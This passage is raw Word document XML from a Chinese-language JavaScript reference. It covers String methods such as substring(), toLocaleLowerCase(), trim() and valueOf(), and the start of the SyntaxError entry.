        <w:t>。如果省略这个参数，则返回的子串将持续到</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的结尾。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新的字符串，长度为</w:t>
      </w:r>
      <w:r>
        <w:t>to-from</w:t>
      </w:r>
      <w:r>
        <w:t>，内容为</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的一个子串。新字符串的内容为</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中从位置</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>to-1</w:t>
      </w:r>
      <w:r>
        <w:t>的字符的副本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>String.substring()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中位置</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>之间的字符组成的子串。包含位置</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>处的字符，但不包含位置</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>处的字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>等于</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>，则这个方法将返回一个空（长度为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的）字符串。如果</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>比</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>大，这个方法将先交换两个参数的值，然后返回它们之间的子串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>子串中包含位置</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>处的字符，但不包含</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>处的字符，记住这一点很重要。这看</w:t>
      </w:r>
      <w:r>
        <w:t>起来有些随意或违反直觉，不过这个体系的一个值得注意的特性是，返回的子串的长度总是等于</w:t>
      </w:r>
      <w:r>
        <w:t>to-from</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>String.slice()</w:t>
      </w:r>
      <w:r>
        <w:t>和非标准的</w:t>
      </w:r>
      <w:r>
        <w:t>String.substr()</w:t>
      </w:r>
      <w:r>
        <w:t>也能从字符串中提取子串。但和这些方法不同，</w:t>
      </w:r>
      <w:r>
        <w:t>String.substring()</w:t>
      </w:r>
      <w:r>
        <w:t>不接受负参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.charAt()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.slice()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.substr()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="769" w:name="String_toLocaleLowerCase__"/>
      <w:r>
        <w:t>String.toLocaleLowerCase()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="769"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个字符串转</w:t>
      </w:r>
      <w:r>
        <w:t>为小写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>string.toLocaleLowerCase()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本，其中字符都已经以本地化的方式转换为小写字母。只有一小部分语言（如土耳其语）有本地化的大小写映射，所以这个方法一般和</w:t>
      </w:r>
      <w:r>
        <w:t>toLowerCase()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的内容相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.toLocaleUpperCase()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.toLowerCase()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.toUpperCase()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="770" w:name="String_toLocaleUpperCase__"/>
      <w:r>
        <w:t>String.toLocaleUpperCase()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="770"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个字符串转为大写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.toLocaleUpperCase()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本，其中字符都已经以本地化的方式转换为大写字母。只有一小部分语言（如土耳其语）有本地化的大小写映射，所以这个方法一般和</w:t>
      </w:r>
      <w:r>
        <w:t>toLowerCase()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的内容相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.toLocaleLowerCase()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.toLowerCase()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.toUpperCase()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="771" w:name="String_toLowerCase__"/>
      <w:r>
        <w:t>String.toLowerCase()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="771"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个字符串转换为小写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.toLowerCase()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本，如果其中有大写字母，则大写字母都已转换为对应的小写形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="772" w:name="String_toString__"/>
      <w:r>
        <w:t>String.toString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="772"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回对应字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的原始字符串值。很少需要调用这个方法。</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如果在一个非</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="773" w:name="String_toUpperCase__"/>
      <w:r>
        <w:t>String.toUpperCase()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="773"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个字符串转换为大写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.toUpperCase()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本，如果其中有小写字母，则小写字母都已转换为对应的大写形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="774" w:name="String_trim__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>String.trim()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="774"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>去掉开头和结尾处的空白字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.trim()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本，其中开头和结尾处的空白字符都已移除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.replace()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="775" w:name="String_valueOf__"/>
      <w:r>
        <w:t>String.valueOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="775"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回对应的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:t>Object.valueOf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.valueOf()</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string</w:t>
      </w:r>
      <w:r>
        <w:t>的原始字符串值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果在一个非</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="776" w:name="SyntaxError"/>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:bookmarkEnd w:id="776"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>抛出以便通知一个语法错误</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SyntaxError()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>new SyntaxError(message)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t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一条可选的错误消息，提供关于该异常的详细信息。如果指定，则这个参数将用做对应的</w:t>
      </w:r>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新构造的</w:t>
      </w:r>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则该</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象将使用它作为自己的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值；在其他情况下，它将使用一个预定义的默认字符串作为该属性的值。当不使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符将</w:t>
      </w:r>
      <w:r>
        <w:t>SyntaxError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数作为一个函数调用时，它的行为和使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符时一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一条提供关于该异常的细节的错误消息。这个属性的值为传入构造函数的字符串的值，或者为预定义的默认字符串。细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>。</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一个指定该异常的类型的字符串。所有</w:t>
      </w:r>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的这个属性的都继承自值</w:t>
      </w:r>
      <w:r>
        <w:t>"SyntaxError"</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在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中，</w:t>
      </w:r>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:r>
        <w:t>类的实例用于在通知语法错误时抛出。</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
